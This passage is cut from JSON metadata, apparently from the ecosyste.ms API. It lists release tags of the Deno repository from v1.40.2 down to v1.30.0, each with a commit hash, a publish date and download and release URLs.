/github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.